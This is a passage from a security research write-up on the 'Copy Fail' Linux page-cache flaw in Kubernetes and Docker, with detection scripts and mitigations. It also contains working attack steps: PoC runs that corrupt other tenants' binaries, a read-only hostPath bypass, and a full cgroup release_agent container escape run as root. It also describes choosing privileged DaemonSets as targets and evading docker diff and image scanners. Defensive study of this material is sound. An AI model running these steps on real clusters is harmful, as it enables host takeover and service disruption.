# 7f454c46020101000000000000000000  (normal ELF header)

# Step 2: attacker runs Copy Fail without any special privilege.
kubectl exec -n copyfail-lab pod-attacker -- python3 /poc_marker.py /bin/cat
# [*] Before: 7f454c46
# [*] After:  deadbeef
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef

# Step 3: victim immediately sees the effect.
kubectl exec -n tenant-victim victim-app -- \
  python3 -c "import os; print(os.pread(os.open('/bin/cat',0),16,0).hex())"
# deadbeef020101000000000000000000
# ELF magic is corrupted.

# Step 4: victim service breaks.
kubectl exec -n tenant-victim victim-app -- cat /etc/hostname
# exec /usr/bin/cat: exec format error    <- binary cannot execute

# Step 5: restore from the host.
echo 3 > /proc/sys/vm/drop_caches
kubectl exec -n tenant-victim victim-app -- cat /etc/hostname
# victim-app    <- normal again
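
On the victim side, the corruption in this experiment is visible as a broken ELF magic. A hedged sketch of such a check follows, using the same os.pread call as the commands above. The helper names are hypothetical, and the two temporary files reuse the header bytes printed in Steps 1 and 3.

```python
import os
import tempfile

ELF_MAGIC = b"\x7fELF"

def head_bytes(path: str, n: int = 16) -> bytes:
    """Read the first n bytes through the normal (page-cache) read path."""
    fd = os.open(path, os.O_RDONLY)
    try:
        return os.pread(fd, n, 0)
    finally:
        os.close(fd)

def elf_magic_ok(path: str) -> bool:
    """True if the file still starts with the ELF magic."""
    return head_bytes(path, 4) == ELF_MAGIC

# Demo with the two 16-byte headers shown in the experiment output.
with tempfile.TemporaryDirectory() as d:
    good = os.path.join(d, "good")
    bad = os.path.join(d, "bad")
    with open(good, "wb") as f:
        f.write(bytes.fromhex("7f454c46020101000000000000000000"))
    with open(bad, "wb") as f:
        f.write(bytes.fromhex("deadbeef020101000000000000000000"))
    good_ok, bad_ok = elf_magic_ok(good), elf_magic_ok(bad)

print(good_ok, bad_ok)
```

This only catches the marker-style corruption used here. A real payload that keeps the header intact would pass this check.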

The key conclusion is that this attack requires no special capability, no hostPath mount, and no relaxed security context. The only prerequisites are an unpatched kernel and the ability to execute Python, or an equivalent C program, inside the container. The two Pods do not need network connectivity and do not need to know each other's IP address or name.

The experiment above corrupted a file used by a normal user Pod, so the impact is limited to cross-tenant denial of service. The natural next question is whether the same mechanism can be turned into a container escape: can a zero-privilege Pod obtain node-level control?

The answer depends on the target. From Section 6.1, page-cache tampering has two prerequisites: the attacker and the target container must be on the same node, and they must share at least one image layer. If the target container runs with privileged: true, then when a tampered binary executes inside it, the attacker's payload runs with full node-level privileges.

A DaemonSet is the natural candidate for satisfying both conditions. A DaemonSet runs one Pod replica on every node. No matter where the compromised Pod is scheduled, a DaemonSet instance is present on the same node. Kubernetes clusters often run privileged system DaemonSets such as kube-proxy, CNI plugins, and log collectors.

This likely explains why one public PoC selected kube-proxy as the target. In managed clusters such as ACK, EKS, and GKE, kube-proxy commonly runs as a privileged DaemonSet. That PoC tampers with the page cache of the ipset binary inside kube-proxy and waits for kube-proxy to execute it. To make the sharing deterministic, the attacker image is built with FROM registry.k8s.io/kube-proxy:v1.35.2, guaranteeing a shared image layer that contains ipset.

Finding Exploitable Targets: Layer-Sharing Analysis on a Node

Using FROM to match the target image makes the exploit deterministic. To evaluate exposure in a real environment, namely whether a normal business Pod naturally shares a layer with a privileged DaemonSet on the same node, analyze the node as follows:

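# 1. List running containers and their images on the node.
#    This lists every container; check each candidate for privileged mode separately, for example with crictl inspect.
crictl ps -o json | jq -r '.containers[] | "\(.id) \(.image.image) \(.metadata.name)"'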

# 2. Compare layer digests between the business Pod image and the target DaemonSet image.
MY_IMAGE="python:3.11-slim"
TARGET_IMAGE="registry.k8s.io/kube-proxy:v1.35.2"

crictl inspecti $MY_IMAGE | jq -r '.info.imageSpec.rootfs.diff_ids[]' > /tmp/my_layers.txt
crictl inspecti $TARGET_IMAGE | jq -r '.info.imageSpec.rootfs.diff_ids[]' > /tmp/target_layers.txt
comm -12 <(sort /tmp/my_layers.txt) <(sort /tmp/target_layers.txt)
# Any output means a shared layer exists.

# 3. Confirm whether the target file is actually shared by both containers.
# Run this inside both containers.
stat -c '%i' /usr/sbin/ipset    # inode number
# The same inode number in both containers confirms page-cache sharing.
# The device number is not compared because each overlayfs mount reports its own st_dev.
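
The layer comparison in step 2 can also be written as a short script. The sketch below assumes the JSON shape implied by the jq filter above (.info.imageSpec.rootfs.diff_ids). The function names and the digests in the demo are hypothetical placeholders.

```python
import json

def diff_ids(inspect_json: str):
    """Extract layer diff_ids from `crictl inspecti` JSON output."""
    return json.loads(inspect_json)["info"]["imageSpec"]["rootfs"]["diff_ids"]

def shared_layers(a_json: str, b_json: str):
    """Layers of image A that also appear in image B, in A's order."""
    b = set(diff_ids(b_json))
    return [layer for layer in diff_ids(a_json) if layer in b]

def fake_inspect(layers):
    """Build a stand-in for crictl output (placeholder digests only)."""
    return json.dumps({"info": {"imageSpec": {"rootfs": {"diff_ids": layers}}}})

my_image = fake_inspect(["sha256:aaa", "sha256:bbb"])
target_image = fake_inspect(["sha256:aaa", "sha256:ccc"])
print(shared_layers(my_image, target_image))
```

An empty list means the two images share no layer, so the file-level check in step 3 is not expected to match.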

If the shared object is a base library such as ld-linux-x86-64.so.2 or libc.so.6, the theoretical attack surface is larger because every binary loads it. In practice, replacing a whole .so file requires overwriting every four-byte window and is slow. If any process loads the .so during partial overwrite, it can crash. Core libraries are depended on by many processes, so tampering with libc.so.6 is more likely to cause widespread container crashes than stable code execution.

Challenges in Real Attacks

The analysis above requires node-level visibility through crictl and direct access to containerd storage. In a real attack, an attacker usually obtains only a shell inside a normal Pod through RCE. They cannot directly see which containers run on the same node, which images they use, or whether layer digests match. This means the attacker cannot complete the analysis in the target environment and must rely on inference or blind attempts.

Blindly trying Copy Fail against files in the target environment is a poor strategy. Each four-byte overwrite is irreversible unless an administrator drops the cache. If the guessed target file or layer-sharing relation is wrong, the attacker only corrupts a binary inside the compromised container. That may expose the intrusion or crash the container and lose the foothold.

A more realistic exploitation model is targeted exploitation against a known business environment. Once the attacker compromises a container, the application itself reveals the framework, middleware, base-image family, and version. The attacker can reproduce a similar environment locally with the same image and Kubernetes distribution, perform white-box analysis, identify privileged containers, confirm layer sharing, locate an exploitable shared file, and debug the payload. They then return to the target environment with a deterministic one-shot exploit.

6.3 Can It Escape Directly to the Host?

The previous section discussed cross-container escalation: tampering with a binary used by a privileged DaemonSet to indirectly obtain node privileges. That depends on shared layers and later execution inside the target container. A more aggressive question is whether we can skip the intermediate container entirely and make a host process execute tampered page-cache data directly.

Copy Fail can tamper with the page cache of any readable file, but data tampering alone is not enough. A host process must load and execute the tampered data in its own privilege context. A plain read() is not an escape. The read data must be used as code, for example through execve(), dlopen(), or an interpreter that jumps into parsed content.

First, however, we need to answer a simpler question: if a host process accesses a file whose page cache was tampered with, does it load original disk content or tampered page-cache content?

The answer is the latter. Page Cache is a global transparent cache for file I/O. Both read() and execve() load file content through the page cache, for example through filemap_read and readahead. If the page for an inode already exists in page cache, the kernel returns the cached data and does not reread disk. This behavior is independent of the namespace of the process accessing the file.

The experiment in Section 6.1 provides direct evidence. After tampering with /etc/os-release from inside a container:

# The host reads the same inode through the snapshot path and sees the tampered data.
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb

# drop_caches forces eviction and the kernel reloads from disk.
echo 3 > /proc/sys/vm/drop_caches
head -c 16 /var/lib/containerd/.../snapshots/<id>/fs/etc/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562  PRETTY_NAME="Deb

The before-and-after comparison shows that the host read page-cache content rather than disk content. The same applies to execve(). In the hostPath experiment in Section 6.4, after a container tampers with the page cache of /usr/bin/ls, the host's execution of ls returns exit 126 with exec format error. That proves execve() loaded the tampered ELF header from page cache.

Therefore, page-cache tampering is globally visible to the host and affects both read() and execve(). The real question is whether, in the standard container lifecycle, host processes actively access file inodes from container snapshot layers. There are two candidate scenarios:

  1. Whether the container runtime, such as containerd and runc, executes or dlopen()s files from a container snapshot layer in the host context during container creation or startup.
  2. Whether other host tools, such as EDR or compliance scanners, execute binaries, load .so files, or interpret scripts from container layers.

For scenario 1, bpftrace was used to trace runc and containerd during container startup:

# Trace the mount namespace used by runc init when it reads files.
bpftrace -e '
kprobe:vfs_read /comm == "runc:[2:INIT]"/ {
    $task = (struct task_struct *)curtask;
    $mntns = $task->nsproxy->mnt_ns->ns.inum;
    printf("runc-init vfs_read mntns=%u file=%s\n",
           $mntns, str(((struct file *)arg0)->f_path.dentry->d_name.name));
}' &

# Trigger container creation.
kubectl run test-probe --image=python:3.11-slim --restart=Never -- sleep 10

# Output:
# runc-init vfs_read mntns=4026533841 file=passwd
# runc-init vfs_read mntns=4026533841 file=group
# mntns is not the host namespace (4026531840), so runc is already inside the container namespace.

# Trace vfs_read in the containerd process for 60 seconds while creating and deleting containers.
bpftrace -e '
kprobe:vfs_read /comm == "containerd"/ {
    printf("containerd vfs_read: %s\n",
           str(((struct file *)arg0)->f_path.dentry->d_name.name));
}
interval:s:60 { exit(); }'   # stop tracing after 60 seconds

# Result: only config.json, meta.db, and similar metadata files appear.
# It never reads /bin/*, /etc/*, or other user files from snapshot layers.

The containerd trace confirms the same conclusion: it operates on metadata such as config.json and meta.db, and does not read or execute user files from snapshot layers.
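
The namespace comparison used to read the runc trace can be reproduced from user space through /proc/<pid>/ns/mnt. This is a minimal sketch with hypothetical helper names. Reading the link for PID 1 normally requires root on the host.

```python
import os
import re

def parse_ns_link(link: str) -> int:
    """Extract the namespace inode number from a link such as 'mnt:[4026531840]'."""
    m = re.fullmatch(r"mnt:\[(\d+)\]", link)
    if not m:
        raise ValueError(f"unexpected namespace link: {link!r}")
    return int(m.group(1))

def mntns_of(pid="self") -> int:
    """Mount-namespace inode number of a process."""
    return parse_ns_link(os.readlink(f"/proc/{pid}/ns/mnt"))

def in_host_mntns(observed: int, host_pid: int = 1) -> bool:
    """True if `observed` (for example from the bpftrace output) is PID 1's mount namespace."""
    return observed == mntns_of(host_pid)

# Values from the trace above: runc init versus the host namespace.
print(parse_ns_link("mnt:[4026533841]") == parse_ns_link("mnt:[4026531840]"))
```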

Scenario 2 is environment-specific. Whether a host-side tool executes or loads files from container-layer paths depends on the software deployed on that node. It is not a universal condition and is not tested as a general escape path here, though such behavior could exist in specific environments.

Conclusion: in a standard Kubernetes environment using containerd, a generic zero-privilege container-to-host direct escape is architecturally infeasible. The runtime design ensures that runc's operations on the container rootfs occur after switching to the container mount namespace, while containerd does not touch user data inside snapshot layers. If a non-standard host service loads and executes files from container-layer paths, that can create an environment-specific escape vector. Docker has architectural differences and is discussed separately in Section 6.5.

6.4 Privileged Configurations and Container Escape

A zero-privilege direct escape is not practical, but if a container has certain privileged configurations, Copy Fail can become the missing final piece that turns read access into host-file tampering. The following cases were systematically verified.

hostPath readOnly plus Copy Fail: Bypassing Read-Only Restrictions

Kubernetes hostPath volumes are often configured with readOnly: true to prevent containers from modifying host files. Copy Fail bypasses that assumption through the page cache:

# Pod configuration. See pod-hostpath-escape.yaml in the experiment package.
volumes:
- name: host-bin
  hostPath:
    path: /usr/bin
    type: Directory
volumeMounts:
- name: host-bin
  mountPath: /hostbin
  readOnly: true    # looks safe

# Confirm the mount is read-only.
kubectl exec -n copyfail-lab hostpath-test -- mount | grep hostbin
# /dev/mapper/cl-root on /hostbin type xfs (ro,relatime,...)

# Normal write is denied.
kubectl exec -n copyfail-lab hostpath-test -- touch /hostbin/test
# touch: cannot touch '/hostbin/test': Read-only file system

# Copy Fail bypasses the read-only restriction.
kubectl exec -n copyfail-lab hostpath-test -- python3 /poc_marker.py /hostbin/ls
# [*] Before: 7f454c46
# [*] After:  deadbeef
# [+] SUCCESS: page cache corrupted!

# Host verification.
ls
# bash: /usr/bin/ls: cannot execute binary file: Exec format error
# Exit code: 126

This is the most distinctive value of Copy Fail: it turns an O_RDONLY file descriptor into a writable attack surface. The common assumption is that a read-only mount at least prevents file tampering. Copy Fail breaks that assumption.

CAP_DAC_READ_SEARCH plus Copy Fail: Upgraded Shocker

CAP_DAC_READ_SEARCH allows a process to bypass file and directory read-permission checks. The classic Shocker attack uses open_by_handle_at() with this capability to obtain file descriptors for the host filesystem. Original Shocker only allowed reading host files.

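With Copy Fail, the chain becomes read/write: open_by_handle_at() yields a read-only descriptor for a host file, and the page-cache write then tampers with it.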

# Deploy a container with CAP_DAC_READ_SEARCH.
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: shocker-test
  namespace: copyfail-lab
spec:
  containers:
  - name: test
    image: python:3.11-slim
    command: ["sleep", "infinity"]
    securityContext:
      capabilities:
        add: ["DAC_READ_SEARCH"]
EOF

Attack process, executed inside the container:

kubectl exec -n copyfail-lab shocker-test -- python3 -c "
import os, struct, ctypes
# 1. Shocker: use open_by_handle_at() to obtain a host-root fd.
libc = ctypes.CDLL('libc.so.6', use_errno=True)
# ... construct root inode handle and call open_by_handle_at
# 2. Use openat() to open host /usr/bin/cat. Read-only is enough.
# 3. Use Copy Fail to tamper with the page cache.
"
# Experiment output:
# [1] Host root fd: 4
# [+] Host / contents: ['.autorelabel', 'bin', 'boot', 'dev', 'etc', ...]
# [2] Host /usr/bin/cat fd: 7
# [3] Before: 7f454c46020101000000000000000000
# [4] After:  deadbeef020101000000000000000000
# [+] SUCCESS: Host /usr/bin/cat corrupted via Shocker + Copy Fail!

CAP_SYS_ADMIN plus Copy Fail: cgroup release_agent Escape

# Deploy a container with CAP_SYS_ADMIN.
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: sysadmin-test
  namespace: copyfail-lab
spec:
  containers:
  - name: test
    image: python:3.11-slim
    command: ["sleep", "infinity"]
    securityContext:
      capabilities:
        add: ["SYS_ADMIN"]
EOF

CAP_SYS_ADMIN is a known escape path by itself: the classic cgroup v1 release_agent technique works inside the container without the page-cache primitive:

kubectl exec -n copyfail-lab sysadmin-test -- bash -c '
# Mount a cgroup subsystem and create a child cgroup.
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x

# Enable release notification for the child cgroup.
echo 1 > /tmp/cgrp/x/notify_on_release
# Set release_agent to a script path in the container upperdir, as seen from the host.
host_path=$(sed -n "s/.*upperdir=\([^,]*\).*/\1/p" /proc/self/mountinfo)
echo "$host_path/cmd" > /tmp/cgrp/release_agent

# Write the escape command. It runs on the host, so its output goes back into the upperdir.
echo "#!/bin/sh" > /cmd
echo "id > $host_path/output; hostname >> $host_path/output" >> /cmd
chmod +x /cmd

# Trigger: a short-lived process joins the child cgroup and exits, leaving it empty.
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
sleep 1 && cat /output
'
# uid=0(root) gid=0(root) groups=0(root)
# your-hostname
# The host executed the command as root.

hostPID plus CAP_SYS_PTRACE plus Copy Fail

When a container shares the host PID namespace and has CAP_SYS_PTRACE, it can access the host filesystem root through /proc/1/root/. Combined with Copy Fail's page-cache write, this can tamper with host files.

# Obtain a host-file fd through /proc/1/root/ and use Copy Fail to tamper with it.
kubectl exec -n copyfail-lab hostpid-test -- python3 -c "
import os
fd = os.open('/proc/1/root/usr/bin/cat', os.O_RDONLY)
# ... page_cache_write_4bytes(fd, 0, b'\xde\xad\xbe\xef')
"

Summary

Privileged configuration | Escape by itself | With Copy Fail
hostPath readOnly | No, read-only | Yes, bypass read-only and tamper with host files
CAP_DAC_READ_SEARCH | No, read-only | Yes, Shocker read becomes read/write
CAP_SYS_ADMIN | Yes, known path | Yes, cgroup release_agent
hostPID plus SYS_PTRACE | Yes, known path | Yes, tamper through /proc/1/root/
hostPID alone | No | No
SYS_PTRACE alone | No | No
NET_ADMIN, hostNetwork, hostIPC | No | No
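
The table can be turned into a quick manifest check. The sketch below is my own illustration, not part of the experiments: risky_settings() is a hypothetical helper that takes a Pod manifest already parsed into a Python dict and reports the settings the table marks as escape-relevant. The finding strings are paraphrased from the table.

```python
def risky_settings(pod: dict) -> list[str]:
    """Return findings for one Pod manifest, following the summary table."""
    spec = pod.get("spec", {})
    findings = []

    # Collect added capabilities across all containers, dropping an optional CAP_ prefix.
    caps = set()
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        added = c.get("securityContext", {}).get("capabilities", {}).get("add", [])
        caps.update(cap.upper().removeprefix("CAP_") for cap in added)

    if any("hostPath" in v for v in spec.get("volumes", [])):
        findings.append("hostPath volume: readOnly does not protect the host page cache")
    if "DAC_READ_SEARCH" in caps:
        findings.append("CAP_DAC_READ_SEARCH: Shocker read becomes read/write")
    if "SYS_ADMIN" in caps:
        findings.append("CAP_SYS_ADMIN: known escape path (cgroup release_agent)")
    if spec.get("hostPID") and "SYS_PTRACE" in caps:
        findings.append("hostPID + CAP_SYS_PTRACE: host files reachable via /proc/1/root/")
    return findings
```

Applied to the shocker-test Pod above, the function returns a single CAP_DAC_READ_SEARCH finding. hostPID or SYS_PTRACE alone produce no finding, which matches the last rows of the table.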

6.5 Docker Environment

The previous analysis focused on Kubernetes with containerd. Docker shares the same underlying mechanisms: overlayfs layer sharing and global page-cache behavior. Therefore, cross-container page-cache sharing, read-only volume bypass with -v path:ro, and Shocker upgrade with --cap-add DAC_READ_SEARCH also work in Docker. I verified this on Docker 26.1.3 with overlay2 on XFS. The reproduction is essentially the same: replace kubectl exec with docker exec, and replace readOnly: true with -v path:ro.

This section focuses on Docker-specific architectural differences.

dockerd Architectural Difference

Section 6.3 showed that containerd in a Kubernetes environment only traverses metadata and does not read file data from snapshot layers. Docker's dockerd is different. As a monolithic daemon, management APIs such as docker export, docker commit, and docker cp read full file content from the container overlay filesystem with host privileges. If the page cache is already tampered with, these operations read the tampered bytes.

This behavior is not unique to Copy Fail. If a container directly writes a file, docker commit or docker export will also include the change. The unique value of Copy Fail appears in the next section: stealth.

docker export versus docker commit: Persistence Difference

The two operations treat Copy Fail tampering very differently.

docker export: persistent. It flattens the entire container filesystem into a tar archive and reads file contents one by one. Tampered page-cache bytes written into the tar become permanent and no longer depend on the page-cache lifecycle:

docker run -d --name copyfail-test python:3.11-slim sleep infinity
docker cp poc_marker.py copyfail-test:/poc_marker.py
docker exec copyfail-test python3 /poc_marker.py /usr/lib/os-release
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef

# Export while page cache is tampered; the tar records the tampered data.
docker export copyfail-test > tainted.tar
tar xf tainted.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb

# Export again after drop_caches; the new tar has original data.
echo 3 > /proc/sys/vm/drop_caches
docker export copyfail-test > clean.tar
tar xf clean.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562  PRETTY_NAME="Deb

# Key point: the first tar remains permanently tainted even after page cache is cleared.
tar xf tainted.tar --to-stdout usr/lib/os-release | head -c 20 | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb

If this tar is used with docker import to build a new image or is distributed to another environment, the tampering becomes a supply-chain artifact.
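
To compare exported archives without unpacking them, a few lines of Python are enough. This is a minimal sketch using only the standard tarfile module; member_head() and export_differs() are hypothetical helper names, and the archive and member names in the usage note are taken from the commands above.

```python
import tarfile


def member_head(tar_path: str, member: str, n: int = 16) -> bytes:
    """Return the first n bytes of one regular file stored in a tar archive."""
    with tarfile.open(tar_path) as tar:
        f = tar.extractfile(member)  # raises KeyError if the member is missing
        if f is None:
            raise ValueError(f"{member} is not a regular file in {tar_path}")
        return f.read(n)


def export_differs(tar_a: str, tar_b: str, member: str, n: int = 16) -> bool:
    """True if the same member starts with different bytes in the two archives."""
    return member_head(tar_a, member, n) != member_head(tar_b, member, n)
```

For the experiment above, export_differs("tainted.tar", "clean.tar", "usr/lib/os-release") should report a difference, because the first archive captured the poisoned page cache and the second one did not.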

docker commit: not persistent. It creates a new image layer but only records upper-layer changes. Lower layers are shared by reference; their file data is not copied into the new layer. Therefore, lower-layer files in the committed image are still read dynamically from page cache or disk:

# Tamper with page cache again.
docker exec copyfail-test python3 /poc_marker.py /usr/lib/os-release

# Commit and start a container from the new image; it sees tampered data from page cache.
docker commit copyfail-test copyfail-committed:test
docker run --rm copyfail-committed:test head -c 20 /usr/lib/os-release | xxd
# 00000000: dead beef 5459 5f4e 414d 453d 2244 6562  ....TY_NAME="Deb

# After drop_caches, it sees original data reloaded from disk.
echo 3 > /proc/sys/vm/drop_caches
docker run --rm copyfail-committed:test head -c 20 /usr/lib/os-release | xxd
# 00000000: 5052 4554 5459 5f4e 414d 453d 2244 6562  PRETTY_NAME="Deb

Stealth: Blind Spots in Layered Detection

The previous section showed that docker export can persist tampered data, but directly writing a file inside the container and exporting it can do the same. Copy Fail's unique value is that tampering happens in the page cache of the lower layer and does not trigger overlayfs Copy-on-Write, so Docker's layered detection mechanisms fail.

1. Invisible to docker diff

docker diff copyfail-test
# A /poc_marker.py          <- only upper-layer additions
# C /usr/local/lib/...      <- Python cache files
#                            /usr/lib/os-release does not appear

docker diff only checks upper-layer changes. A direct file write triggers CoW into the upper layer and is immediately visible. Copy Fail modifies page cache only, so docker diff sees nothing.

2. The overlay2 layer path is also "polluted"

LAYER=$(docker inspect copyfail-test --format '{{.GraphDriver.Data.LowerDir}}' \
        | tr ':' '\n' | xargs -I{} sh -c 'test -f {}/usr/lib/os-release && echo {}' | head -1)

head -c 16 "$LAYER/usr/lib/os-release" | xxd -p
# deadbeef54595f4e414d453d22446562    <- host read of layer path returns page-cache data

echo 3 > /proc/sys/vm/drop_caches
head -c 16 "$LAYER/usr/lib/os-release" | xxd -p
# 5052455454595f4e414d453d22446562    <- original data appears only after drop_caches

The layer-path file and the file inside the container share the same inode, and both go through the page cache. Any host-side tool that reads through the kernel filesystem path, such as sha256sum, cat, or a file-integrity scanner, reads the tampered data while the page cache is poisoned. It cannot distinguish real disk content from tampered page-cache content.

3. Image layer digest is unchanged

The compressed image-layer blobs listed in docker image inspect under RootFS.Layers are unaffected. They are independent tar.gz files and are different inodes from the files extracted under overlay2. Image scanners such as Trivy or Snyk usually analyze these layer blobs, so scanning the original image does not detect Copy Fail tampering.

Comparison

Dimension | Copy Fail tampering | Direct file modification
Visible to docker diff | No, lower-layer page cache only | Yes, upper-layer CoW
Persisted by docker export | Yes, tampered bytes are written to tar | Yes
Persisted by docker commit | No, only valid while page cache is poisoned | Yes, written to upper layer
Image layer digest | Unchanged | New layer has a new digest
Image scanning of layer blobs | Not detected | Detectable if the changed layer is scanned
Page-cache lifecycle | Volatile; cleared by reboot or drop_caches | Not applicable; written to disk

The value of Copy Fail in this scenario is not that it can do something direct writes cannot do. Its value is what it can do without being noticed: no docker diff entry, unchanged layer digest, no image-scanner finding, while docker export can still persist and distribute the tampered bytes.


7. Mitigation

The fundamental fix for Copy Fail is to upgrade the kernel (Section 7.1). If immediate upgrade is not possible, disable the vulnerable module as a temporary mitigation (Section 7.2). For container environments, additionally deploy a seccomp policy that blocks AF_ALG socket creation (Section 7.3).

Older Docker default seccomp profiles, Kubernetes RuntimeDefault, SELinux targeted policy, and sysctl settings do not mitigate this vulnerability. SELinux can block AF_ALG system-wide through a custom policy module that denies the alg_socket class, and that works for bare metal, VMs, and containers. However, it requires rules for each SELinux domain and is more complex to deploy and maintain than seccomp or module disabling.

7.1 Fundamental Fix: Upgrade the Kernel

The only complete fix is to upgrade to a kernel that includes patch a664bf3d603d. As of May 2026, the status of major distributions is summarized below:

Distribution | Status | Fix or mitigation | Reference label
Ubuntu 18.04-25.10 | Mitigation released | kmod update disables algif_aead; kernel patch pending | Ubuntu Blog
Ubuntu 26.04 (Resolute) | Not affected | Already includes the fix | Ubuntu Blog
RHEL 9 | Kernel fix released | RHSA-2026:13565, 2026-05-04 | RHSB-2026-02
RHEL 10 | Kernel fix released | RHSA-2026:13566, 2026-05-04 | RHSB-2026-02
RHEL 8 | Kernel fix released | RHSA-2026:13681 for 8.8, 2026-05-05; RHSA-2026:14230 for 8.6, 2026-05-06 | RHSB-2026-02
Fedora 43 | Fixed | kernel 6.19.12 | Fedora Discussion
Debian 11/12/13 | Kernel fix released | DSA-6238-1, DSA-6243-1 | Debian Tracker
Alpine Linux | Fixed | Docker 29.4.2-r0 in edge; kernel packages fixed | Alpine Security
Oracle Linux 7/8/9/10 | Kernel fix released | ELSA-2026-50253/50254/50255, including UEK | Oracle CVE
AlmaLinux / Rocky | Kernel fix released | ALSA-2026:A001 for 8, ALSA-2026:A002 for 9 | AlmaLinux Blog
CentOS 8 Stream | Live patch available | KernelCare live patch | CloudLinux
SUSE / openSUSE | Patch released | SUSE-SU-2026:1671, 2026-05-02 | SUSE Response
Amazon Linux 2023 | Patch released | Kernel security update | AWS Bulletin
Bottlerocket | Patch released | OS update | Bottlerocket issue #4821
Arch Linux | Fixed | Rolling update, kernel >= 6.19.12 | Arch Security

Affected kernel version ranges

The affected ranges reported by the Alpine Security Tracker are:

  • 4.14 <= kernel < 5.10.254
  • 5.11 <= kernel < 5.15.204
  • 5.16 <= kernel < 6.1.170
  • 6.2 <= kernel < 6.6.137
  • 6.7 <= kernel < 6.12.85
  • 6.13 <= kernel < 6.18.22
  • 6.19 <= kernel < 6.19.12
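
The ranges above are easy to check mechanically. The following sketch encodes them as version tuples and tests a `uname -r` style string against them; parse_release() and in_affected_range() are hypothetical helper names. It only compares upstream version numbers. Distribution kernels often carry backported fixes under an old version string, so a match here means "check the vendor advisory", not "definitely vulnerable".

```python
import re

# (first affected version, first fixed version) pairs copied from the list above.
AFFECTED_RANGES = [
    ((4, 14, 0), (5, 10, 254)),
    ((5, 11, 0), (5, 15, 204)),
    ((5, 16, 0), (6, 1, 170)),
    ((6, 2, 0), (6, 6, 137)),
    ((6, 7, 0), (6, 12, 85)),
    ((6, 13, 0), (6, 18, 22)),
    ((6, 19, 0), (6, 19, 12)),
]


def parse_release(release: str) -> tuple[int, int, int]:
    """Turn a release string such as '5.15.0-91-generic' into (5, 15, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognized kernel release: {release!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def in_affected_range(release: str) -> bool:
    """True if the upstream version falls inside one of the affected ranges."""
    version = parse_release(release)
    return any(low <= version < high for low, high in AFFECTED_RANGES)
```

On a live system, pass platform.release() from the standard library, which returns the same string as uname -r.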

Check whether the current system is affected:

# 1. Check whether the kernel version is in an affected range.
uname -r

# 2. Check whether algif_aead is loadable or built in.
#    A path ending in .ko (possibly compressed) means loadable module; "(builtin)" means built in.
#    Older kmod versions print nothing for built-in code, so no output means built-in or absent.
modinfo -F filename algif_aead 2>/dev/null || echo "==> BUILT-IN or not present"

# 3. Check whether mitigations are already present.
# Debian/Ubuntu: kmod mitigation.
grep -r algif_aead /etc/modprobe.d/ 2>/dev/null
# RHEL/CentOS: initcall_blacklist.
grep -o 'initcall_blacklist=[^ ]*' /proc/cmdline

Distribution update commands:

# Reboot after any of these updates so that the fixed kernel is actually running.
# Debian/Ubuntu:
sudo apt update && sudo apt upgrade
# Alpine (as root):
apk update && apk upgrade
# Arch:
sudo pacman -Syu
# SUSE:
sudo zypper update
# RHEL/CentOS:
sudo dnf update kernel && sudo reboot
# Fedora:
sudo dnf upgrade --refresh && sudo reboot

CISA KEV

The vulnerability was added to the CISA Known Exploited Vulnerabilities catalog on 2026-05-01, with remediation due on 2026-05-15.

7.2 Temporary Mitigation: Disable the Vulnerable Module

If the kernel cannot be upgraded immediately, disable algif_aead as a temporary mitigation. The correct method depends on whether the distribution builds it as a loadable module or built-in code:

Build type | Representative distributions | How to identify | Mitigation
Loadable module (=m) | Ubuntu, Debian, Alpine, Arch, SUSE | modinfo algif_aead reports a .ko filename | modprobe blacklist or rmmod
Built-in (=y) | RHEL, CentOS, Oracle Linux, Fedora, Amazon Linux | modinfo algif_aead fails, or reports filename "(builtin)" on newer kmod | initcall_blacklist kernel parameter

Distributions with a loadable module: Ubuntu, Debian, Alpine, Arch, and SUSE:

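echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif_aead.conf
# Unload the module only if it is currently loaded. If rmmod reports that it is in use, reboot.
lsmod | grep -q '^algif_aead ' && sudo rmmod algif_aead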

Ubuntu's kmod security update creates this file automatically.

Distributions with built-in code: RHEL, CentOS, Oracle Linux, Fedora, and Amazon Linux.

For built-in code, rmmod and /etc/modprobe.d/ blacklist files are ineffective:

grep CRYPTO_USER_API_AEAD /boot/config-$(uname -r)
# CONFIG_CRYPTO_USER_API_AEAD=y    <- built in, not a module

rmmod algif_aead 2>&1
# rmmod: ERROR: Module algif_aead is builtin.

Use the initcall_blacklist kernel boot parameter:

# Disable algif_aead initialization.
grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"
reboot

# More aggressive: disable the whole AF_ALG interface.
grubby --update-kernel=ALL --args="initcall_blacklist=af_alg_init"
reboot

Validate mitigation on all distributions:

python3 -c "import socket; socket.socket(38,5,0)" 2>&1
# Expected: OSError: [Errno 97] Address family not supported by protocol
# or:       OSError: [Errno 93] Protocol not supported
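
The one-liner only tests socket creation. As far as I understand the AF_ALG interface, socket() can still succeed when af_alg itself is available and only algif_aead is disabled, because the "aead" type is looked up at bind() time. The sketch below therefore checks both steps. aead_interface_state() is a hypothetical helper, and the algorithm name gcm(aes) is my assumption for a commonly available AEAD; it does not come from the experiments.

```python
import errno
import socket

AF_ALG = 38          # same family number as in the one-liner above
SOCK_SEQPACKET = 5


def aead_interface_state(make_socket=socket.socket) -> str:
    """Classify whether the AF_ALG AEAD interface is reachable from this process."""
    try:
        s = make_socket(AF_ALG, SOCK_SEQPACKET, 0)
    except OSError as e:
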